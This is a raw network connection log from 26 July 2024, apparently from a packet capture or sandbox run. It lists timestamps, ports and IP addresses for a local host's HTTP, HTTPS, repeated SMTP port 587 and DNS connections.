Jul 26, 2024 11:39:11.485342979 CEST | 49720 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:11.490305901 CEST | 80 | 49720 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:12.280565977 CEST | 80 | 49720 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:12.281582117 CEST | 49721 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:12.281668901 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:12.281888008 CEST | 49721 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:12.282013893 CEST | 49721 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:12.282036066 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:12.301397085 CEST | 80 | 49720 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:12.301562071 CEST | 49720 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:12.763369083 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:12.765331030 CEST | 49721 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:12.765381098 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:12.906917095 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:12.907145977 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:12.907311916 CEST | 49721 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:12.907661915 CEST | 49721 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:12.910885096 CEST | 49720 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:12.911915064 CEST | 49722 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:12.917046070 CEST | 80 | 49720 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:12.917120934 CEST | 49720 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:12.917367935 CEST | 80 | 49722 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:12.917574883 CEST | 49722 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:12.917669058 CEST | 49722 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:12.922492981 CEST | 80 | 49722 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:13.480638027 CEST | 80 | 49722 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:13.482032061 CEST | 49723 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:13.482125044 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:13.482284069 CEST | 49723 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:13.482513905 CEST | 49723 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:13.482549906 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:13.532541037 CEST | 49722 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:13.984962940 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:13.987092972 CEST | 49723 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:13.987174988 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:14.121973038 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:14.122095108 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.5
Jul 26, 2024 11:39:14.122273922 CEST | 49723 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:14.122596025 CEST | 49723 | 443 | 192.168.2.5 | 188.114.97.3
Jul 26, 2024 11:39:20.245672941 CEST | 49722 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:20.397511005 CEST | 80 | 49722 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:39:20.397598982 CEST | 49722 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:39:20.590868950 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:20.604700089 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:20.604785919 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:21.493563890 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:21.493731976 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:21.498662949 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:21.728148937 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:21.730078936 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:21.735225916 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:21.964288950 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:21.964698076 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:21.970098019 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.267419100 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.267713070 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:22.272617102 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.501398087 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.502785921 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:22.507781029 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.739942074 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.740250111 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:22.745528936 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.974374056 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.975143909 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:22.975239038 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:22.975271940 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:22.975301981 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:22.980184078 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.980226040 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.980535984 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:22.980668068 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:23.389702082 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:23.438796997 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:32.611268044 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:32.616379976 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:33.046582937 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:33.046659946 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:33.046875954 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:33.047022104 CEST | 49730 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:33.048312902 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:33.051847935 CEST | 587 | 49730 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:33.053273916 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:33.053354025 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:33.713608980 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:33.713798046 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:33.718795061 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:33.950326920 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:33.950932980 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:33.956379890 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:34.187680006 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:34.187983036 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:34.193229914 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:34.439315081 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:34.439483881 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:34.444466114 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:34.675419092 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:34.675558090 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:34.680655003 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:34.915971994 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:34.916703939 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:34.922061920 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.154544115 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.154782057 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:35.154834032 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:35.154834032 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:35.154834032 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:35.159977913 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.160021067 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.160063028 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.160561085 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.394805908 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.395258904 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:35.400239944 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.846493006 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.846617937 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:35.847031116 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.847090006 CEST | 49731 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:35.847687960 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:35.851511002 CEST | 587 | 49731 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.852689028 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:35.852760077 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:36.504353046 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:36.504496098 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:36.509747982 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:36.739263058 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:36.739579916 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:36.744854927 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:36.975043058 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:36.975502014 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:36.980488062 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.237426043 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.237565041 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:37.242520094 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.474749088 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.474888086 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:37.479747057 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.713821888 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.713948965 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:37.718868971 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.950402021 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.950634956 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:37.950670958 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:37.950697899 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:37.950714111 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:37.955630064 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.955805063 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.955862045 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:37.955889940 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:38.367907047 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:38.368346930 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:38.373298883 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:38.805028915 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:38.805310965 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:38.805748940 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:38.805818081 CEST | 49732 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:38.806474924 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:38.810945988 CEST | 587 | 49732 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:38.811448097 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:38.811518908 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:39.490287066 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:39.490523100 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:39.495441914 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:39.732033014 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:39.732247114 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:39.737231970 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:39.974550009 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:39.974811077 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:39.979929924 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.234587908 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.234877110 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:40.239918947 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.485876083 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.492093086 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:40.497246981 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.738343000 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.738498926 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:40.743521929 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.981273890 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.982223034 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:40.982223988 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:40.982223988 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:40.982223988 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:40.987675905 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.987710953 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.987723112 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:40.987734079 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:41.426445961 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:41.427006006 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:41.432324886 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:41.870563030 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:41.870790005 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:41.871001005 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:41.871001005 CEST | 49733 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:41.872440100 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:41.876044035 CEST | 587 | 49733 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:41.877397060 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:41.877465963 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:43.123014927 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.123116970 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.123375893 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:43.123375893 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:43.123497009 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.123567104 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:43.128458023 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.359286070 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.359458923 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:43.364566088 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.600292921 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.600500107 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:43.606754065 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.843796968 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:43.844057083 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:43.848980904 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.072933912 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.073223114 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:44.078090906 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.309470892 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.309607029 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:44.316983938 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.540345907 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.540656090 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:44.540700912 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:44.540710926 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:44.540724993 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:44.545902967 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.545917034 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.545927048 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.545941114 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.775960922 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:44.776501894 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:44.781814098 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:45.208156109 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:45.208288908 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:45.208425045 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:45.208477974 CEST | 49734 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:45.209284067 CEST | 49735 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:45.213504076 CEST | 587 | 49734 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:45.214268923 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:45.214328051 CEST | 49735 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:45.907793999 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:45.907948971 CEST | 49735 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:45.923566103 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:46.171327114 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:39:46.171766996 CEST | 49735 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:39:46.178133011 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:11.460212946 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:11.460269928 CEST | 49735 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:11.506748915 CEST | 49735 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:11.511634111 CEST | 587 | 49735 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:11.520276070 CEST | 49737 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:11.525382996 CEST | 587 | 49737 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:11.525471926 CEST | 49737 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:11.988769054 CEST | 80 | 49712 | 158.101.44.242 | 192.168.2.5
Jul 26, 2024 11:40:11.988862038 CEST | 49712 | 80 | 192.168.2.5 | 158.101.44.242
Jul 26, 2024 11:40:29.985862970 CEST | 49737 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:29.990236998 CEST | 49738 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:29.991661072 CEST | 587 | 49737 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:29.991744995 CEST | 49737 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:29.995954037 CEST | 587 | 49738 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:29.996067047 CEST | 49738 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:34.126383066 CEST | 49738 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:34.128953934 CEST | 49739 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:34.134548903 CEST | 587 | 49738 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:34.134607077 CEST | 49738 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:34.134808064 CEST | 587 | 49739 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:34.134856939 CEST | 49739 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:38.956198931 CEST | 49739 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:38.958627939 CEST | 49740 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:38.963924885 CEST | 587 | 49740 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:38.965920925 CEST | 587 | 49739 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:38.966305017 CEST | 49739 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:38.966305017 CEST | 49740 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:56.876351118 CEST | 49740 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:56.880525112 CEST | 49741 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:56.882280111 CEST | 587 | 49740 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:56.884525061 CEST | 49740 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:40:56.886943102 CEST | 587 | 49741 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:40:56.892502069 CEST | 49741 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:41:05.752412081 CEST | 49741 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:41:05.753051996 CEST | 49742 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:41:05.758203983 CEST | 587 | 49741 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:41:05.758327007 CEST | 49741 | 587 | 192.168.2.5 | 77.245.159.7
Jul 26, 2024 11:41:05.758790016 CEST | 587 | 49742 | 77.245.159.7 | 192.168.2.5
Jul 26, 2024 11:41:05.760504007 CEST | 49742 | 587 | 192.168.2.5 | 77.245.159.7
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Jul 26, 2024 11:38:59.371063948 CEST | 54781 | 53 | 192.168.2.5 | 1.1.1.1
            Jul 26, 2024 11:38:59.445704937 CEST | 53 | 54781 | 1.1.1.1 | 192.168.2.5
